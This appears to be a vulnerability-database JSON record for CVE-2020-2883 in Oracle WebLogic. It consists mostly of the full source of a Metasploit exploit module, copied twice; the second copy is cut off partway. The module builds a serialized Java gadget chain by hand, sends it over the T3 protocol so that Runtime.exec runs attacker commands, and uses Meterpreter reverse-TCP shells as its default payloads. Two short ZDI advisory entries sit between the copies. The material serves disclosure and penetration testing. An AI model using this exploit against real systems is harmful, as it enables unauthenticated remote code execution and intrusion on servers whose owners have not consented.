Gem::Version.new(version)\n print_status(\"WebLogic version detected: #{@version_no}\")\n\n return CheckCode::Appears if versions.include?(@version_no)\n\n CheckCode::Detected('Version of WebLogic is not vulnerable')\n ensure\n disconnect\n end\n\n def exploit\n super\n\n connect\n print_status('Sending handshake...')\n t3_handshake\n\n if target.name == 'Windows'\n win_obj = cmd_psh_payload(payload.encoded, payload_instance.arch.first, { remove_comspec: true })\n win_obj.prepend('cmd.exe /c ')\n win_obj = build_payload_obj(win_obj)\n t3_send(win_obj)\n else\n execute_cmdstager\n end\n ensure\n disconnect\n end\n\n def t3_handshake\n # t3 12.2.1\\nAS:255\n # \\nHL:19\\nMS:100000\n # 00\\n\\n\n shake = '74332031322e322e310a41533a323535'\n shake << '0a484c3a31390a4d533a313030303030'\n shake << '30300a0a'\n\n sock.put([shake].pack('H*'))\n sleep(1)\n sock.get_once\n end\n\n def build_payload_obj(payload_data)\n payload_obj = 'aced0005' # STREAM_MAGIC, STREAM_VERSION\n payload_obj << '73720017' # TC_OBJECT, TC_CLASSDESC, class name length: 23\n payload_obj << '6a6176612e7574696c2e5072696f726974795175657565' # java.util.PriorityQueue\n payload_obj << '94da30b4fb3f82b1' # SerialVersionUID\n payload_obj << '030002' # 2 fields\n payload_obj << '490004' # Integer, field name length: 4\n payload_obj << '73697a65' # size\n payload_obj << '4c000a' # Object, field name length: 10\n payload_obj << '636f6d70617261746f72' # comparator\n payload_obj << '740016' # String, field name length: 22\n payload_obj << '4c6a6176612f7574696c2f436f6d70617261746f723b' # Ljava/util/Comparator;\n payload_obj << '7870'\n payload_obj << '00000002'\n payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC\n payload_obj << '0030' # Class name length: 48\n payload_obj << '636f6d2e74616e676f736f6c2e7574696c2e636f' # com.tangosol.util.comparator.ExtractorComparator\n payload_obj << '6d70617261746f722e457874726163746f72436f'\n payload_obj << '6d70617261746f72'\n payload_obj << extractor_comp_uid # SerialVersionUID\n payload_obj << '020001' # Serializable, 1 field\n payload_obj << '4c000b' # Object, field name length: 11\n payload_obj << '6d5f657874726163746f72' # m_extractor\n payload_obj << '740022'\n payload_obj << '4c636f6d2f74616e676f736f6c2f7574696c2f56' # Lcom/tangosol/util/ValueExtractor;\n payload_obj << '616c7565457874726163746f723b'\n payload_obj << '7870'\n payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC\n payload_obj << '002c' # Class name length: 44\n payload_obj << '636f6d2e74616e676f736f6c2e7574696c2e6578' # com.tangosol.util.extractor.ChainedExtractor\n payload_obj << '74726163746f722e436861696e65644578747261'\n payload_obj << '63746f72'\n payload_obj << chained_extractor_uid # SerialVersionUID\n payload_obj << '020000'\n payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC\n payload_obj << '0036' # Class name length: 54\n payload_obj << '636f6d2e74616e676f736f6c2e7574696c2e6578' # com.tangosol.util.extractor.AbstractCompositeExtractor\n payload_obj << '74726163746f722e4162737472616374436f6d70'\n payload_obj << '6f73697465457874726163746f72'\n payload_obj << '086b3d8c05690f44' # SerialVersionUID\n payload_obj << '020001' # Serializable, 1 field\n payload_obj << '5b000c' # array, length: 12\n payload_obj << '6d5f61457874726163746f72' # m_aExtractor\n payload_obj << '740023' # String, length: 35\n payload_obj << '5b4c636f6d2f74616e676f736f6c2f7574696c2f' # [Lcom/tangosol/util/ValueExtractor;\n payload_obj << '56616c7565457874726163746f723b'\n payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC\n payload_obj << '002d' # Class name length: 45\n payload_obj << '636f6d2e74616e676f736f6c2e7574696c2e6578' # com.tangosol.util.extractor.AbstractExtractor\n payload_obj << '74726163746f722e416273747261637445787472'\n payload_obj << '6163746f72'\n payload_obj << abstract_extractor_uid # SerialVersionUID\n payload_obj << '020001' # Serializable, 1 field\n payload_obj << '490009' # Integer, field name length: 9\n payload_obj << '6d5f6e546172676574' # m_nTarget\n payload_obj << '7870'\n payload_obj << '00000000'\n payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC\n payload_obj << '0023' # Class name length: 35\n payload_obj << '5b4c636f6d2e74616e676f736f6c2e7574696c2e' # [Lcom.tangosol.util.ValueExtractor;\n payload_obj << '56616c7565457874726163746f723b'\n payload_obj << '2246204735c4a0fe' # SerialVersionUID\n payload_obj << '020000'\n payload_obj << '7870'\n payload_obj << '00000003'\n payload_obj << '7372'\n payload_obj << '002f' # Class name length: 47\n payload_obj << '636f6d2e74616e676f736f6c2e7574696c2e6578' # com.tangosol.util.extractor.ReflectionExtractor\n payload_obj << '74726163746f722e5265666c656374696f6e4578'\n payload_obj << '74726163746f72'\n payload_obj << reflection_extractor_uid # SerialVersionUID\n payload_obj << '02000' # Serializable\n payload_obj << reflect_extract_count\n payload_obj << '5b0009' # array, length: 9\n payload_obj << '6d5f616f506172616d' # m_aoParam\n payload_obj << '740013' # String, length: 19\n payload_obj << '5b4c6a6176612f6c616e672f4f626a6563743b' # [Ljava/lang/Object;\n payload_obj << add_sect\n payload_obj << '4c0009' # Object, length: 9\n payload_obj << '6d5f734d6574686f64' # m_sMethod\n payload_obj << '740012' # String, length: 18\n payload_obj << '4c6a6176612f6c616e672f537472696e673b' # Ljava/lang/String;\n payload_obj << '7871' # TC_ENDBLOCKDATA, TC_REFERENCE\n payload_obj << '007e0009' # handle\n payload_obj << '00000000'\n payload_obj << '7572'\n payload_obj << '0013' # Class name length: 19\n payload_obj << '5b4c6a6176612e6c616e672e4f626a6563743b' # [Ljava.lang.Object;\n payload_obj << '90ce589f1073296c' # SerialVersionUID\n payload_obj << '020000'\n payload_obj << '7870'\n payload_obj << '00000002'\n payload_obj << '74000a' # String, length: 10\n payload_obj << '67657452756e74696d65' # getRuntime\n payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC\n payload_obj << '0012' # Class name length: 18\n payload_obj << '5b4c6a6176612e6c616e672e436c6173733b' # [Ljava.lang.Class;\n payload_obj << 'ab16d7aecbcd5a99' # SerialVersionUID\n payload_obj << '020000' # Serializable, no fields\n payload_obj << '7870'\n payload_obj << '00000000'\n payload_obj << add_tc_null\n payload_obj << '740009' # String, length: 9\n payload_obj << '6765744d6574686f64' # getMethod\n payload_obj << '7371'\n payload_obj << '007e000d' # handle\n payload_obj << '00000000'\n payload_obj << '7571'\n payload_obj << (change_handle? ? '007e0012' : '007e0011') # handle\n payload_obj << '00000002'\n payload_obj << '707571'\n payload_obj << (change_handle? ? '007e0012' : '007e0011') # handle\n payload_obj << '00000000'\n payload_obj << add_tc_null\n payload_obj << '740006' # String, length: 6\n payload_obj << '696e766f6b65' # invoke\n payload_obj << '7371'\n payload_obj << '007e000d' # handle\n payload_obj << '00000000'\n payload_obj << '7571'\n payload_obj << (change_handle? ? '007e0012' : '007e0011') # handle\n payload_obj << '00000001'\n payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC\n payload_obj << '0013' # Class name length: 19\n payload_obj << '5b4c6a6176612e6c616e672e537472696e673b' # [Ljava.lang.String;\n payload_obj << 'add256e7e91d7b47' # SerialVersionUID\n payload_obj << '020000'\n payload_obj << '7870'\n payload_obj << '00000003'\n\n payload_bin = format_payload(payload_data)\n payload_obj << payload_bin\n\n payload_obj << add_tc_null\n payload_obj << '740004'\n payload_obj << '65786563' # exec\n payload_obj << '7704'\n payload_obj << '00000003'\n payload_obj << '76720011'\n payload_obj << '6a6176612e6c616e672e52756e74696d65' # java.lang.Runtime\n payload_obj << '0000000000000000000000'\n payload_obj << '7870'\n payload_obj << '740001'\n payload_obj << '3178'\n end\n\n def extractor_comp_uid\n case @version_no\n when Gem::Version.new('12.1.3.0.0')\n 'c7ad6d3a676f3c18'\n when Gem::Version.new('12.2.1.3.0')\n 'fb4ac83df1d72edc'\n else\n 'f9b3bc58cc52cd21'\n end\n end\n\n def change_handle?\n @version_no == Gem::Version.new('12.2.1.3.0')\n end\n\n def chained_extractor_uid\n case @version_no\n when Gem::Version.new('12.1.3.0.0')\n '889f81b0945d5b7f'\n when Gem::Version.new('12.2.1.3.0')\n '06ee10433a4cc4b4'\n else\n '435b250b72f63db5'\n end\n end\n\n def abstract_extractor_uid\n case @version_no\n when Gem::Version.new('12.1.3.0.0')\n '658195303e723821'\n when Gem::Version.new('12.2.1.3.0')\n '752289ad4d460138'\n else\n '9b1be18ed70100e5'\n end\n end\n\n def reflection_extractor_uid\n case @version_no\n when Gem::Version.new('12.1.3.0.0')\n 'ee7ae995c02fb4a2'\n when Gem::Version.new('12.2.1.3.0')\n '87973791b26429dd'\n else\n '1f62f564b951b614'\n end\n end\n\n def reflect_extract_count\n case @version_no\n when Gem::Version.new('12.2.1.3.0')\n '3'\n else\n '2'\n end\n end\n\n def add_sect\n sect = ''\n\n if @version_no == Gem::Version.new('12.2.1.3.0')\n sect << '4c0011' # Object, length: 17\n sect << '6d5f657874726163746f' # m_extractorCached\n sect << '72436163686564'\n sect << '740012'\n sect << '4c6a6176612f6c616e67' # Ljava/lang/Object;\n sect << '2f4f626a6563743b'\n end\n\n sect\n end\n\n def add_tc_null\n return '70' if @version_no == Gem::Version.new('12.2.1.3.0')\n\n ''\n end\n\n def t3_send(payload_obj)\n print_status('Sending object...')\n\n request_obj = '000009f3' # Original packet length\n request_obj << '016501' # CMD_IDENTIFY_REQUEST, flags\n request_obj << 'ffffffffffffffff'\n request_obj << '00000071'\n request_obj << '0000ea60'\n request_obj << '00000018432ec6'\n request_obj << 'a2a63985b5af7d63e643'\n request_obj << '83f42a6d92c9e9af0f94'\n request_obj << '72027973720078720178'\n request_obj << '720278700000000c0000'\n request_obj << '00020000000000000000'\n request_obj << '00000001007070707070'\n request_obj << '700000000c0000000200'\n request_obj << '00000000000000000000'\n request_obj << '01007006'\n request_obj << 'fe010000' # separator\n request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION\n request_obj << '7372' # TC_OBJECT, TC_CLASSDESC\n request_obj << '001d' # Class name length: 29\n request_obj << '7765626c6f6769632e72' # weblogic.rjvm.ClassTableEntry\n request_obj << '6a766d2e436c61737354'\n request_obj << '61626c65456e747279'\n request_obj << '2f52658157f4f9ed' # SerialVersionUID\n request_obj << '0c0000' # flags?\n request_obj << '787072' # TC_ENDBLOCKDATA, TC_NULL, TC_CLASSDESC\n request_obj << '0024' # Class name length: 36\n request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PackageInfo\n request_obj << '6f6d6d6f6e2e696e7465'\n request_obj << '726e616c2e5061636b61'\n request_obj << '6765496e666f'\n request_obj << 'e6f723e7b8ae1ec9' # SerialVersionUID\n request_obj << '020009' # Serializable, 9 fields\n request_obj << '490005' # Field type: Int, field name length: 5\n request_obj << '6d616a6f72' # major\n request_obj << '490005' # Field type: Int, field name length: 5\n request_obj << '6d696e6f72' # minor\n request_obj << '49000b' # Field type: Int, field name length: 11\n request_obj << '70617463685570646174' # patchUpdate\n request_obj << '65'\n request_obj << '49000c' # Field type: Int, field name length: 12\n request_obj << '726f6c6c696e67506174' # rollingPatch\n request_obj << '6368'\n request_obj << '49000b' # Field type: Int, field name length: 11\n request_obj << '73657276696365506163' # servicePack\n request_obj << '6b'\n request_obj << '5a000e' # Field type: Z = Bool, field name length: 14\n request_obj << '74656d706f7261727950' # temporaryPatch\n request_obj << '61746368'\n request_obj << '4c0009' # Field type: Object, field name length: 9\n request_obj << '696d706c5469746c65' # implTitle\n request_obj << '740012' # String, length: 18\n request_obj << '4c6a6176612f6c616e67' # Ljava/lang/String;\n request_obj << '2f537472696e673b'\n request_obj << '4c000a' # Field type: Object, field name length: 10\n request_obj << '696d706c56656e646f72' # implVendor\n request_obj << '71007e0003' # TC_REFERENCE, handle\n request_obj << '4c000b' # Field type: Object, field name length: 11\n request_obj << '696d706c56657273696f6e' # implVersion\n request_obj << '71007e0003' # TC_REFERENCE, handle\n request_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL\n request_obj << '7702' # TC_ENDBLOCKDATA\n request_obj << '000078'\n request_obj << 'fe010000' # separator\n\n request_obj << payload_obj\n\n request_obj << 'fe010000' # separator\n request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION\n request_obj << '7372' # TC_OBJECT, TC_CLASSDESC\n request_obj << '001d' # Class name length: 29\n request_obj << '7765626c6f6769632e72' # weblogic.rjvm.ClassTableEntry\n request_obj << '6a766d2e436c61737354'\n request_obj << '61626c65456e747279'\n request_obj << '2f52658157f4f9ed' # SerialVersionUID\n request_obj << '0c0000'\n request_obj << '787072' # TC_ENDBLOCKDATA, TC_NULL, TC_CLASSDESC\n request_obj << '0021' # Class name length: 33\n request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PeerInfo\n request_obj << '6f6d6d6f6e2e696e7465'\n request_obj << '726e616c2e5065657249'\n request_obj << '6e666f'\n request_obj << '585474f39bc908f1' # SerialVersionUID\n request_obj << '020007' # Serializable, 7 fields\n request_obj << '490005' # Field type: Int, field name length: 5\n request_obj << '6d616a6f72' # major\n request_obj << '490005' # Field type: Int, field name length: 5\n request_obj << '6d696e6f72' # minor\n request_obj << '49000b' # Field type: Int, field name length: 11\n request_obj << '70617463685570646174' # patchUpdate\n request_obj << '65'\n request_obj << '49000c' # Field type: Int, field name length: 12\n request_obj << '726f6c6c696e67506174' # rollingPatch\n request_obj << '6368'\n request_obj << '49000b' # Field type: Int, field name length: 11\n request_obj << '73657276696365506163' # servicePack\n request_obj << '6b'\n request_obj << '5a000e' # Field type: Z = Bool, field name length: 14\n request_obj << '74656d706f7261727950' # temporaryPatch\n request_obj << '61746368'\n request_obj << '5b0008' # Field type: Array, field name length: 8\n request_obj << '7061636b61676573' # packages\n request_obj << '740027' # String, length: 39\n request_obj << '5b4c7765626c6f676963' # [Lweblogic/common/internal/PackageInfo;\n request_obj << '2f636f6d6d6f6e2f696e'\n request_obj << '7465726e616c2f506163'\n request_obj << '6b616765496e666f3b'\n request_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC\n request_obj << '0024' # Class name length: 36\n request_obj << '7765626c6f6769632e63' # weblogic.common.internal.VersionInfo\n request_obj << '6f6d6d6f6e2e696e7465'\n request_obj << '726e616c2e5665727369'\n request_obj << '6f6e496e666f'\n request_obj << '972245516452463e' # SerialVersionUID\n request_obj << '020003' # Serializable, 3 fields\n request_obj << '5b0008' # Field type: Array, field name length: 8\n request_obj << '7061636b61676573' # packages\n request_obj << '71007e0003' # TC_REFERENCE, handle\n request_obj << '4c000e' # Field type: Object, field name length: 14\n request_obj << '72656c65617365566572' # releaseVersion\n request_obj << '73696f6e'\n request_obj << '740012' # String, length: 18\n request_obj << '4c6a6176612f6c616e67' # Ljava/lang/String;\n request_obj << '2f537472696e673b'\n request_obj << '5b0012' # Field type: Array, field name length: 18\n request_obj << '76657273696f6e496e66' # versionInfoAsBytes\n request_obj << '6f41734279746573'\n request_obj << '740002' # String, length: 2\n request_obj << '5b42' # [B\n request_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC\n request_obj << '0024' # Class name length: 36\n request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PackageInfo\n request_obj << '6f6d6d6f6e2e696e7465'\n request_obj << '726e616c2e5061636b61'\n request_obj << '6765496e666f'\n request_obj << 'e6f723e7b8ae1ec9' # SerialVersionUID\n request_obj << '020009' # Serializable, 9 fields\n request_obj << '490005' # Field type: Int, field name length: 5\n request_obj << '6d616a6f72' # major\n request_obj << '490005' # Field type: Int, field name length: 5\n request_obj << '6d696e6f72' # minor\n request_obj << '49000b' # Field type: Int, field name length: 11\n request_obj << '70617463685570646174' # patchUpdate\n request_obj << '65'\n request_obj << '49000c' # Field type: Int, field name length: 12\n request_obj << '726f6c6c696e67506174' # rollingPatch\n request_obj << '6368'\n request_obj << '49000b' # Field type: Int, field name length: 11\n request_obj << '73657276696365506163' # servicePack\n request_obj << '6b'\n request_obj << '5a000e' # Field type: Z = Bool, field name length: 14\n request_obj << '74656d706f7261727950' # temporaryPatch\n request_obj << '61746368'\n request_obj << '4c0009' # Field type: Object, field name length: 9\n request_obj << '696d706c5469746c65' # implTitle\n request_obj << '71007e0005' # TC_REFERENCE, handle\n request_obj << '4c000a' # Field type: Object, field name length: 10\n request_obj << '696d706c56656e646f72' # implVendor\n request_obj << '71007e0005' # TC_REFERENCE, handle\n request_obj << '4c000b' # Field type: Object, field name length: 11\n request_obj << '696d706c56657273696f' # implVersion\n request_obj << '6e'\n request_obj << '71007e0005' # TC_REFERENCE, handle\n request_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL\n request_obj << '7702000078' # TC_BLOCKDATA, 2 bytes, TC_ENDBLOCKDATA\n request_obj << 'fe00ff' # separator\n request_obj << 'fe010000'\n request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION\n request_obj << '7372' # TC_OBJECT, TC_CLASSDESC\n request_obj << '0013' # Class name length: 19\n request_obj << '7765626c6f6769632e72' # weblogic.rjvm.JVMID\n request_obj << '6a766d2e4a564d4944'\n request_obj << 'dc49c23ede121e2a' # SerialVersionUID\n request_obj << '0c0000'\n request_obj << '787077' # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA\n request_obj << '4621'\n request_obj << '000000000000000000'\n request_obj << '09' # length: 9\n request_obj << '3132372e302e312e31' # 127.0.1.1\n request_obj << '000b' # length: 11\n request_obj << '75732d6c2d627265656e' # us-l-breens\n request_obj << '73'\n request_obj << 'a53caff10000000700'\n request_obj << '001b59'\n request_obj << 'ffffffffffffffffffff'\n request_obj << 'ffffffffffffffffffff'\n request_obj << 'ffffffff'\n request_obj << '0078'\n request_obj << 'fe010000' # separator\n request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION\n request_obj << '7372' # TC_OBJECT, TC_CLASSDESC\n request_obj << '0013' # Class name length: 19\n request_obj << '7765626c6f6769632e72' # weblogic.rjvm.JVMID\n request_obj << '6a766d2e4a564d4944'\n request_obj << 'dc49c23ede121e2a' # SerialVersionUID\n request_obj << '0c0000'\n request_obj << '787077' # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA\n request_obj << '1d0181401281'\n request_obj << '34bf427600093132372e'\n request_obj << '302e312e31a53caff1'\n request_obj << '000000000078'\n\n new_len = (request_obj.length / 2).to_s(16).rjust(8, '0')\n request_obj[0, 8] = new_len\n\n sock.put([request_obj].pack('H*'))\n sleep(1)\n end\n\n def format_payload(payload_cmd)\n print_status('Formatting payload...')\n payload_arr = payload_cmd.split(' ', 3)\n\n formatted_payload = ''\n payload_arr.each do |part|\n formatted_payload << '74' # denotes a string\n formatted_payload << part.length.to_s(16).rjust(4, '0')\n formatted_payload << part.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join\n end\n\n formatted_payload\n end\n\n def execute_command(cmd, _opts = {})\n cmd.prepend('/bin/sh -c ')\n cmd = build_payload_obj(cmd)\n\n t3_send(cmd)\n end\nend\n", "sourceHref": "https://0day.today/exploit/34538", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdi": [{"lastseen": "2022-01-31T22:06:40", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Oracle WebLogic. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the T3 protocol. Crafted data in a T3 protocol message can trigger the deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current process.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-16T00:00:00", "type": "zdi", "title": "Oracle WebLogic Server T3 Protocol Deserialization of Untrusted Data Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-2883"], "modified": "2020-04-16T00:00:00", "id": "ZDI-20-504", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-504/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-31T22:05:58", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Oracle WebLogic. Authentication is not required to exploit this vulnerability. The specific flaw exists within the Oracle Coherence library. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the service account.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-30T00:00:00", "type": "zdi", "title": "Oracle WebLogic Server T3 Protocol Deserialization of Untrusted Data Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-2883"], "modified": "2020-04-30T00:00:00", "id": "ZDI-20-570", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-570/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2020-06-05T00:59:02", "description": "", "cvss3": {}, "published": "2020-06-04T00:00:00", "type": "packetstorm", "title": "WebLogic Server Deserialization Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-2883"], "modified": "2020-06-04T00:00:00", "id": "PACKETSTORM:157950", "href": "https://packetstormsecurity.com/files/157950/WebLogic-Server-Deserialization-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::Powershell \ninclude Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'WebLogic Server Deserialization RCE BadAttributeValueExpException ExtComp', \n'Description' => %q{ \nThere exists a Java object deserialization vulnerability \nin multiple versions of WebLogic. \n \nUnauthenticated remote code execution can be achieved by \nsending a serialized `BadAttributeValueExpException` \nobject over the T3 protocol to vulnerable versions of \nWebLogic. Leveraging an `ExtractorComparator` enables \nthe ability to trigger `method.invoke()`, which will \nexecute arbitrary code. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Quynh Le', # Vulnerability Discovery \n'Y4er', # PoC \n'Shelby Pace' # Metasploit Module \n], \n'References' => \n[ \n[ 'CVE', '2020-2883' ], \n[ 'URL', 'https://www.thezdi.com/blog/2020/5/8/details-on-the-oracle-weblogic-vulnerability-being-exploited-in-the-wild' ], \n], \n'Platform' => %w[unix linux win], \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'Privileged' => false, \n'Targets' => \n[ \n[ \n'Windows', \n{ \n'Platform' => 'win', \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'DefaultOptions' => { 'Payload' => 'windows/meterpreter/reverse_tcp' } \n} \n], \n[ \n'Unix', \n{ \n'Platform' => %w[unix linux], \n'CmdStagerFlavor' => 'printf', \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' } \n} \n], \n], \n'DisclosureDate' => '2020-04-30', \n'DefaultTarget' => 0 \n) \n) \n \nregister_options([ Opt::RPORT(7001) ]) \nend \n \ndef check \nconnect \n \nweb_req = \"GET /console/login/LoginForm.jsp HTTP/1.1\\nHost: #{peer}\\n\\n\" \nsock.put(web_req) \nsleep(2) \nres = sock.get_once \n \nversions = \n[ \nGem::Version.new('12.1.3.0.0'), Gem::Version.new('12.2.1.3.0'), \nGem::Version.new('12.2.1.4.0') \n] \n \nreturn CheckCode::Unknown('Failed to obtain response from service') unless res \n \n/WebLogic\\s+Server\\s+Version:\\s+(?<version>\\d+\\.\\d+\\.\\d+\\.*\\d*\\.*\\d*)/ =~ res \nreturn CheckCode::Unknown('Failed to detect WebLogic') unless version \n \n@version_no = Gem::Version.new(version) \nprint_status(\"WebLogic version detected: #{@version_no}\") \n \nreturn CheckCode::Appears if versions.include?(@version_no) \n \nCheckCode::Detected('Version of WebLogic is not vulnerable') \nensure \ndisconnect \nend \n \ndef exploit \nsuper \n \nconnect \nprint_status('Sending handshake...') \nt3_handshake \n \nif target.name == 'Windows' \nwin_obj = cmd_psh_payload(payload.encoded, payload_instance.arch.first, { remove_comspec: true }) \nwin_obj.prepend('cmd.exe /c ') \nwin_obj = build_payload_obj(win_obj) \nt3_send(win_obj) \nelse \nexecute_cmdstager \nend \nensure \ndisconnect \nend \n \ndef t3_handshake \n# t3 12.2.1\\nAS:255 \n# \\nHL:19\\nMS:100000 \n# 00\\n\\n \nshake = '74332031322e322e310a41533a323535' \nshake << '0a484c3a31390a4d533a313030303030' \nshake << '30300a0a' \n \nsock.put([shake].pack('H*')) \nsleep(1) \nsock.get_once \nend \n \ndef build_payload_obj(payload_data) \npayload_obj = 'aced0005' # STREAM_MAGIC, STREAM_VERSION \npayload_obj << '73720017' # TC_OBJECT, TC_CLASSDESC, class name length: 23 \npayload_obj << '6a6176612e7574696c2e5072696f726974795175657565' # java.util.PriorityQueue \npayload_obj << '94da30b4fb3f82b1' # SerialVersionUID \npayload_obj << '030002' # 2 fields \npayload_obj << '490004' # Integer, field name length: 4 \npayload_obj << '73697a65' # size \npayload_obj << '4c000a' # Object, field name length: 10 \npayload_obj << '636f6d70617261746f72' # comparator \npayload_obj << '740016' # String, field name length: 22 \npayload_obj << '4c6a6176612f7574696c2f436f6d70617261746f723b' # Ljava/util/Comparator; \npayload_obj << '7870' \npayload_obj << '00000002' \npayload_obj << '7372' # TC_OBJECT, TC_CLASSDESC \npayload_obj << '0030' # Class name length: 48 \npayload_obj << '636f6d2e74616e676f736f6c2e7574696c2e636f' # com.tangosol.util.comparator.ExtractorComparator \npayload_obj << '6d70617261746f722e457874726163746f72436f' \npayload_obj << '6d70617261746f72' \npayload_obj << extractor_comp_uid # SerialVersionUID \npayload_obj << '020001' # Serializable, 1 field \npayload_obj << '4c000b' # Object, field name length: 11 \npayload_obj << '6d5f657874726163746f72' # m_extractor \npayload_obj << '740022' \npayload_obj << '4c636f6d2f74616e676f736f6c2f7574696c2f56' # Lcom/tangosol/util/ValueExtractor; \npayload_obj << '616c7565457874726163746f723b' \npayload_obj << '7870' \npayload_obj << '7372' # TC_OBJECT, TC_CLASSDESC \npayload_obj << '002c' # Class name length: 44 \npayload_obj << '636f6d2e74616e676f736f6c2e7574696c2e6578' # com.tangosol.util.extractor.ChainedExtractor \npayload_obj << '74726163746f722e436861696e65644578747261' \npayload_obj << '63746f72' \npayload_obj << chained_extractor_uid # SerialVersionUID \npayload_obj << '020000' \npayload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC \npayload_obj << '0036' # Class name length: 54 \npayload_obj << '636f6d2e74616e676f736f6c2e7574696c2e6578' # com.tangosol.util.extractor.AbstractCompositeExtractor \npayload_obj << '74726163746f722e4162737472616374436f6d70' \npayload_obj << '6f73697465457874726163746f72' \npayload_obj << '086b3d8c05690f44' # SerialVersionUID \npayload_obj << '020001' # Serializable, 1 field \npayload_obj << '5b000c' # array, length: 12 \npayload_obj << '6d5f61457874726163746f72' # m_aExtractor \npayload_obj << '740023' # String, length: 35 \npayload_obj << '5b4c636f6d2f74616e676f736f6c2f7574696c2f' # [Lcom/tangosol/util/ValueExtractor; \npayload_obj << '56616c7565457874726163746f723b' \npayload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC \npayload_obj << '002d' # Class name length: 45 \npayload_obj << '636f6d2e74616e676f736f6c2e7574696c2e6578' # com.tangosol.util.extractor.AbstractExtractor \npayload_obj << '74726163746f722e416273747261637445787472' \npayload_obj << '6163746f72' \npayload_obj << abstract_extractor_uid # SerialVersionUID \npayload_obj << '020001' # Serializable, 1 field \npayload_obj << '490009' # Integer, field name length: 9 \npayload_obj << '6d5f6e546172676574' # m_nTarget \npayload_obj << '7870' \npayload_obj << '00000000' \npayload_obj << '7572' # TC_ARRAY, TC_CLASSDESC \npayload_obj << '0023' # Class name length: 35 \npayload_obj << '5b4c636f6d2e74616e676f736f6c2e7574696c2e' # 